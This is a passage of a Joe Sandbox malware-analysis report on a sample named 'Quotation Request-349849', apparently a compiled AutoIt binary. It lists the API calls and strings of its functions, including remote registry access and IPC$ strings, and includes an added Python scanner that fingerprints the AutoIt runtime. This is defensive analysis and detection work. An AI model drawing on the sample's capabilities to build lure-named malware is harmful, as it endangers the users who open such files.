                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                      • String ID:
                                                      • API String ID: 3840717409-0
                                                      • Opcode ID: 8ea7ed4f128c7baa441b45ff529193b8eb3677396cbab5c472fb40c81c91508c
                                                      • Instruction ID: 901f3093e09268782ecc2b265a93e8a939ffc03853c3637df1b34055f4e7a6eb
                                                      • Opcode Fuzzy Hash: 8ea7ed4f128c7baa441b45ff529193b8eb3677396cbab5c472fb40c81c91508c
                                                      • Instruction Fuzzy Hash: 8C411875601208EFDB119F65DC88EABBBB9FF89722F104068FA09D7261D7749D05CB60
                                                      APIs
                                                      • __wsplitpath.LIBCMT ref: 0083DA10
                                                      • _wcscat.LIBCMT ref: 0083DA28
                                                      • _wcscat.LIBCMT ref: 0083DA3A
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0083DA4F
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0083DA63
                                                      • GetFileAttributesW.KERNEL32(?), ref: 0083DA7B
                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 0083DA95
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0083DAA7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                      • String ID: *.*
                                                      • API String ID: 34673085-438819550
                                                      • Opcode ID: 0f19306fe488e6516a6fa88fed48286e034ffcada488620ba09659919e3d0996
                                                      • Instruction ID: fdabb7b9bf8f6b7e4749a9f417ff1ac9d479dba8df53cd96123acef3daa9cb63
                                                      • Opcode Fuzzy Hash: 0f19306fe488e6516a6fa88fed48286e034ffcada488620ba09659919e3d0996
                                                      • Instruction Fuzzy Hash: D081B2725043449FCB20EF64D844AAABBE8FFC9714F14882EF889C7251E734E945CB92
                                                      APIs
                                                        • Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0085C1FC
                                                      • GetFocus.USER32 ref: 0085C20C
                                                      • GetDlgCtrlID.USER32(00000000), ref: 0085C217
                                                      • _memset.LIBCMT ref: 0085C342
                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0085C36D
                                                      • GetMenuItemCount.USER32(?), ref: 0085C38D
                                                      • GetMenuItemID.USER32(?,00000000), ref: 0085C3A0
                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0085C3D4
                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0085C41C
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0085C454
                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0085C489
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                      • String ID: 0
                                                      • API String ID: 1296962147-4108050209
                                                      • Opcode ID: 668db5b1935d40bf94cdd163cf08f2b6110ac225263e981e1268c930f9f909ff
                                                      • Instruction ID: bf74989911d5ec498ab936aac550e3f2b5ebe66c1594cc1333b59615a2476c3f
                                                      • Opcode Fuzzy Hash: 668db5b1935d40bf94cdd163cf08f2b6110ac225263e981e1268c930f9f909ff
                                                      • Instruction Fuzzy Hash: 66816A70208305AFD711DF14C894AAABBE4FB88716F00492EFA95D7292D770D909CF92
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 0084738F
                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0084739B
                                                      • CreateCompatibleDC.GDI32(?), ref: 008473A7
                                                      • SelectObject.GDI32(00000000,?), ref: 008473B4
                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00847408
                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00847444
                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00847468
                                                      • SelectObject.GDI32(00000006,?), ref: 00847470
                                                      • DeleteObject.GDI32(?), ref: 00847479
                                                      • DeleteDC.GDI32(00000006), ref: 00847480
                                                      • ReleaseDC.USER32(00000000,?), ref: 0084748B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                      • String ID: (
                                                      • API String ID: 2598888154-3887548279
                                                      • Opcode ID: 0c2f6ca79c0037d6d336f4a8708903ca127903174da553d526f8ebd2a263bff9
                                                      • Instruction ID: c3168af3519423ef959bf75ef8ffc1b9db83e1aec2ee6dae062fd8852583fd7f
                                                      • Opcode Fuzzy Hash: 0c2f6ca79c0037d6d336f4a8708903ca127903174da553d526f8ebd2a263bff9
                                                      • Instruction Fuzzy Hash: 1F512775A04309EFCB15CFA8CC85EAEBBB9FF48310F148429FA5A97351C735A9408B50
                                                      APIs
                                                        • Part of subcall function 007F0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,007D6B0C,?,00008000), ref: 007F0973
                                                        • Part of subcall function 007D4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D4743,?,?,007D37AE,?), ref: 007D4770
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 007D6BAD
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 007D6CFA
                                                        • Part of subcall function 007D586D: _wcscpy.LIBCMT ref: 007D58A5
                                                        • Part of subcall function 007F363D: _iswctype.LIBCMT ref: 007F3645
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                      • API String ID: 537147316-1018226102
                                                      • Opcode ID: a9635941c025ee7b56852437e2b88a81bbbdcafc34f7afdcd189e901c4fdc071
                                                      • Instruction ID: e25ab262466182f29dc6277a63199e2a3884fbbd24aa3b707104a3e7a8819888
                                                      • Opcode Fuzzy Hash: a9635941c025ee7b56852437e2b88a81bbbdcafc34f7afdcd189e901c4fdc071
                                                      • Instruction Fuzzy Hash: C2025671108340DFC724EF24C8859AFBBF5FF94314F14492EF59A972A2DA38A949CB52
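                                                       The records above that reference the AutoIt3 runtime's own literals (the error-dialog formats such as `Line %d (File "%s"):`, the `mciSendStringW` CD-door commands, and the script-loader markers `>>>AUTOIT SCRIPT<<<`, `AU3!` and `EA06`) together fingerprint the interpreter stub, which is what the "Binary is likely a compiled AutoIt script file" signature rests on. The Python scanner below is an added example written for this page; it is not Joe Sandbox output and not code from the sample. It searches a buffer for those literals in both ASCII and UTF-16LE (the runtime uses wide-string APIs such as LoadStringW and _wcscpy, so the encoding in a dump is not known in advance) and only reports a match when the script markers and at least two error-format strings are present. The grouping of the strings by role, the two-of-N threshold, and the `build_sample` buffer are the example's own assumptions. Caveat: these strings live in the interpreter's code, so a hit identifies the AutoIt3 stub, not whether an attached script is malicious; the same tell is usually written as a YARA rule and paired with script extraction.

```python
"""
Fingerprint the AutoIt3 runtime stub by its embedded literal strings.

Added example for this report page; not Joe Sandbox output and not the
sample's own code. Literals are taken from the "String ID" entries of the
function records above; their grouping by role is an editorial assumption.
"""
from __future__ import annotations

from dataclasses import dataclass, field

# Markers referenced by the script-loader function (>>>AUTOIT SCRIPT<<< / AU3! / EA06).
SCRIPT_MARKERS = (b">>>AUTOIT SCRIPT<<<", b"AU3!", b"EA06")
# Format strings referenced by the runtime's error-dialog functions.
ERROR_FORMATS = (
    b'Line %d (File "%s"):',
    b"Line %d:",
    b"^ ERROR",
    b"#include depth exceeded. Make sure there are no recursive includes",
)
# MCI command strings from the CD-door function; generic, so never decisive alone.
MCI_COMMANDS = (b"set cd door", b"close cd wait", b"type cdaudio alias cd wait")


def _encodings(literal: bytes) -> tuple[tuple[str, bytes], ...]:
    """ASCII and UTF-16LE forms of a literal; a wide-char runtime may store either."""
    return (("ascii", literal), ("utf16", literal.decode("ascii").encode("utf-16-le")))


@dataclass
class Hit:
    literal: str
    encoding: str
    offset: int  # offset into the scanned buffer, not a virtual address


@dataclass
class Fingerprint:
    hits: list[Hit] = field(default_factory=list)

    def matched(self, group: tuple[bytes, ...]) -> set[str]:
        """Literals from `group` that were found at least once."""
        wanted = {g.decode("ascii") for g in group}
        return {h.literal for h in self.hits if h.literal in wanted}

    @property
    def has_script_header(self) -> bool:
        # Assumption: the loader checks for both "AU3!" and "EA06"; both are
        # xrefs of the same function in the record above.
        return self.matched(SCRIPT_MARKERS) >= {"AU3!", "EA06"}

    @property
    def looks_like_autoit_runtime(self) -> bool:
        # Script markers plus at least two error-format strings (threshold is
        # an assumption chosen to tolerate one string being split or relocated).
        return self.has_script_header and len(self.matched(ERROR_FORMATS)) >= 2


def scan(data: bytes) -> Fingerprint:
    """Find every occurrence of every literal, in both encodings."""
    fp = Fingerprint()
    for literal in SCRIPT_MARKERS + ERROR_FORMATS + MCI_COMMANDS:
        for enc, needle in _encodings(literal):
            start = 0
            while (idx := data.find(needle, start)) != -1:
                fp.hits.append(Hit(literal.decode("ascii"), enc, idx))
                start = idx + 1
    return fp


def build_sample() -> bytes:
    """Constructed stand-in for a memory dump (not real sample bytes): filler
    around the literals, with the wide-string ones encoded as UTF-16LE."""
    def wide(s: str) -> bytes:
        return s.encode("utf-16-le") + b"\x00\x00"

    return (
        b"MZ" + b"\x00" * 62
        + wide('Line %d (File "%s"):')
        + wide("^ ERROR")
        + wide("set cd door")
        + b"\x90" * 16
        + b">>>AUTOIT SCRIPT<<<" + b"AU3!EA06" + b"\x00" * 8
    )


if __name__ == "__main__":
    result = scan(build_sample())
    for hit in result.hits:
        print(f"{hit.offset:#010x} {hit.encoding:5s} {hit.literal!r}")
    print("AutoIt3 runtime stub:", result.looks_like_autoit_runtime)
```

                                                       `Hit.offset` is relative to the buffer; to turn it into an address in a dump such as the one the records cite, add the dump's base (the `Offset: 007D0000` value in each "Memory Dump Source" entry). Running the scanner against the other .sdmp regions listed under "Associated" is how one would confirm which region actually holds the script markers.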
                                                      APIs
                                                      • _memset.LIBCMT ref: 00832D50
                                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00832DDD
                                                      • GetMenuItemCount.USER32(00895890), ref: 00832E66
                                                      • DeleteMenu.USER32(00895890,00000005,00000000,000000F5,?,?), ref: 00832EF6
                                                      • DeleteMenu.USER32(00895890,00000004,00000000), ref: 00832EFE
                                                      • DeleteMenu.USER32(00895890,00000006,00000000), ref: 00832F06
                                                      • DeleteMenu.USER32(00895890,00000003,00000000), ref: 00832F0E
                                                      • GetMenuItemCount.USER32(00895890), ref: 00832F16
                                                      • SetMenuItemInfoW.USER32(00895890,00000004,00000000,00000030), ref: 00832F4C
                                                      • GetCursorPos.USER32(?), ref: 00832F56
                                                      • SetForegroundWindow.USER32(00000000), ref: 00832F5F
                                                      • TrackPopupMenuEx.USER32(00895890,00000000,?,00000000,00000000,00000000), ref: 00832F72
                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00832F7E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                      • String ID:
                                                      • API String ID: 3993528054-0
                                                      APIs
                                                        • Part of subcall function 007D7BCC: _memmove.LIBCMT ref: 007D7C06
                                                      • _memset.LIBCMT ref: 0082786B
                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008278A0
                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008278BC
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008278D8
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00827902
                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0082792A
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00827935
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0082793A
                                                      Similarity
                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                      • API String ID: 1411258926-22481851
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0084FDAD,?,?), ref: 00850E31
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                      • API String ID: 3964851224-909552448
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0080E2A0,00000010,?,Bad directive syntax error,0085F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0082F7C2
                                                      • LoadStringW.USER32(00000000,?,0080E2A0,00000010), ref: 0082F7C9
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                      • _wprintf.LIBCMT ref: 0082F7FC
                                                      • __swprintf.LIBCMT ref: 0082F81E
                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0082F88D
                                                      Similarity
                                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                      • API String ID: 1506413516-4153970271
                                                      APIs
                                                        • Part of subcall function 007D7BCC: _memmove.LIBCMT ref: 007D7C06
                                                        • Part of subcall function 007D7924: _memmove.LIBCMT ref: 007D79AD
                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00835330
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00835346
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00835357
                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00835369
                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0083537A
                                                      Similarity
                                                      • API ID: SendString$_memmove
                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                      • API String ID: 2279737902-1007645807
                                                      APIs
                                                      Similarity
                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                      • String ID: 0.0.0.0
                                                      • API String ID: 208665112-3771769585
                                                      APIs
                                                      • timeGetTime.WINMM ref: 00834F7A
                                                        • Part of subcall function 007F049F: timeGetTime.WINMM(?,75A4B400,007E0E7B), ref: 007F04A3
                                                      • Sleep.KERNEL32(0000000A), ref: 00834FA6
                                                      • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00834FCA
                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00834FEC
                                                      • SetActiveWindow.USER32 ref: 0083500B
                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00835019
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00835038
                                                      • Sleep.KERNEL32(000000FA), ref: 00835043
                                                      • IsWindow.USER32 ref: 0083504F
                                                      • EndDialog.USER32(00000000), ref: 00835060
                                                      Similarity
                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                      • String ID: BUTTON
                                                      • API String ID: 1194449130-3405671355
                                                      APIs
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                      • CoInitialize.OLE32(00000000), ref: 0083D5EA
                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0083D67D
                                                      • SHGetDesktopFolder.SHELL32(?), ref: 0083D691
                                                      • CoCreateInstance.OLE32(00862D7C,00000000,00000001,00888C1C,?), ref: 0083D6DD
                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0083D74C
                                                      • CoTaskMemFree.OLE32(?,?), ref: 0083D7A4
                                                      • _memset.LIBCMT ref: 0083D7E1
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0083D81D
                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0083D840
                                                      • CoTaskMemFree.OLE32(00000000), ref: 0083D847
                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0083D87E
                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 0083D880
                                                      Similarity
                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                      • String ID:
                                                      • API String ID: 1246142700-0
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000001), ref: 0082C283
                                                      • GetWindowRect.USER32(00000000,?), ref: 0082C295
                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0082C2F3
                                                      • GetDlgItem.USER32(?,00000002), ref: 0082C2FE
                                                      • GetWindowRect.USER32(00000000,?), ref: 0082C310
                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0082C364
                                                      • GetDlgItem.USER32(?,000003E9), ref: 0082C372
                                                      • GetWindowRect.USER32(00000000,?), ref: 0082C383
                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0082C3C6
                                                      • GetDlgItem.USER32(?,000003EA), ref: 0082C3D4
                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0082C3F1
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0082C3FE
                                                      Similarity
                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                      • String ID:
                                                      • API String ID: 3096461208-0
                                                      APIs
                                                        • Part of subcall function 007D1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007D2036,?,00000000,?,?,?,?,007D16CB,00000000,?), ref: 007D1B9A
                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007D20D3
                                                      • KillTimer.USER32(-00000001,?,?,?,?,007D16CB,00000000,?,?,007D1AE2,?,?), ref: 007D216E
                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 0080BCA6
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007D16CB,00000000,?,?,007D1AE2,?,?), ref: 0080BCD7
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007D16CB,00000000,?,?,007D1AE2,?,?), ref: 0080BCEE
                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007D16CB,00000000,?,?,007D1AE2,?,?), ref: 0080BD0A
                                                      • DeleteObject.GDI32(00000000), ref: 0080BD1C
                                                      Similarity
                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                      • String ID:
                                                      • API String ID: 641708696-0
                                                      APIs
                                                        • Part of subcall function 007D25DB: GetWindowLongW.USER32(?,000000EB), ref: 007D25EC
                                                      • GetSysColor.USER32(0000000F), ref: 007D21D3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ColorLongWindow
                                                      • String ID:
                                                      • API String ID: 259745315-0
                                                      • Opcode ID: 968ed529c82fb07abc814db4a33c86cb655956e09d6b04fa4f132b4a6a46da9a
                                                      • Instruction ID: 135c715bd872edfdfc5c555a82588868fe6bfab542b1d7946c584ee53f6fe53f
                                                      • Opcode Fuzzy Hash: 968ed529c82fb07abc814db4a33c86cb655956e09d6b04fa4f132b4a6a46da9a
                                                      • Instruction Fuzzy Hash: 7A417031104640DBDB265F28DC88BB93B65FB16331F194266FE658A2E7C7399C43DB21
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?,0085F910), ref: 0083A90B
                                                      • GetDriveTypeW.KERNEL32(00000061,008889A0,00000061), ref: 0083A9D5
                                                      • _wcscpy.LIBCMT ref: 0083A9FF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                      • API String ID: 2820617543-1000479233
                                                      • Opcode ID: e534f7dc7d525c97d8a11f4ead546b853f4899f0f68048c9a7c6824c00c4dd88
                                                      • Instruction ID: 71905554f7a8056d9d737999af81d70c6e83ff3fa9b85dca2576a33debd5b848
                                                      • Opcode Fuzzy Hash: e534f7dc7d525c97d8a11f4ead546b853f4899f0f68048c9a7c6824c00c4dd88
                                                      • Instruction Fuzzy Hash: F4518D31108301DBC708EF14C996A6EBBA5FF84744F50482EFA95A73A2DB359909CB93
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __i64tow__itow__swprintf
                                                      • String ID: %.15g$0x%p$False$True
                                                      • API String ID: 421087845-2263619337
                                                      • Opcode ID: 5dbe0c180fbf4ea69ab649105098b8c9dc7b26f731c9259f45db3f89fee0a5f6
                                                      • Instruction ID: 5d43f6c3ff926a3cfab3778281b6fc31cb54361410b77473df5e5e5bcff223e6
                                                      • Opcode Fuzzy Hash: 5dbe0c180fbf4ea69ab649105098b8c9dc7b26f731c9259f45db3f89fee0a5f6
                                                      • Instruction Fuzzy Hash: BC41B171600209EFEB24DF38DC46A7A73F8FF05700F2044AEE649D7392EA3999419B50
                                                      APIs
                                                      • _memset.LIBCMT ref: 0085716A
                                                      • CreateMenu.USER32 ref: 00857185
                                                      • SetMenu.USER32(?,00000000), ref: 00857194
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00857221
                                                      • IsMenu.USER32(?), ref: 00857237
                                                      • CreatePopupMenu.USER32 ref: 00857241
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0085726E
                                                      • DrawMenuBar.USER32 ref: 00857276
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
